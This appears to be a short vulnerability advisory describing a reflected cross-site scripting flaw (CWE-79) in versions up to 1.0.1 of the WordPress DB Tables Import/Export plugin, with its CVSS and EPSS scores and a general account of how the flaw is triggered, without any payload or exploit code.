This vulnerability is caused by improper neutralization of input during web page generation, allowing attackers to inject malicious scripts that are reflected back to the victim’s browser. When an attacker supplies specially crafted data, the plugin outputs it without adequate escaping, enabling the execution of arbitrary client‑side code. Successfully executed scripts can steal session cookies, perform actions on behalf of the user, or deface the site. The weakness is a classic input validation flaw, classified as CWE‑79.

The flaw exists in the WordPress DB Tables Import/Export plugin developed by Alberto Cocchiara. Any installation of the plugin in versions up to and including 1.0.1 is affected. Users of these versions who continue to rely on the plugin for database table import or export are at risk.

The CVSS score of 7.1 indicates a moderate‑to‑high severity vulnerability. The EPSS score of less than 1% suggests a low probability of exploitation at present, and the flaw is not listed in CISA’s KEV catalog. Based on the description, it is inferred that the attack is web‑based, requiring an attacker to manipulate a URL or form input that the plugin processes and echoes back. If the user visits a crafted link or submits a malicious request, the reflected XSS can be triggered.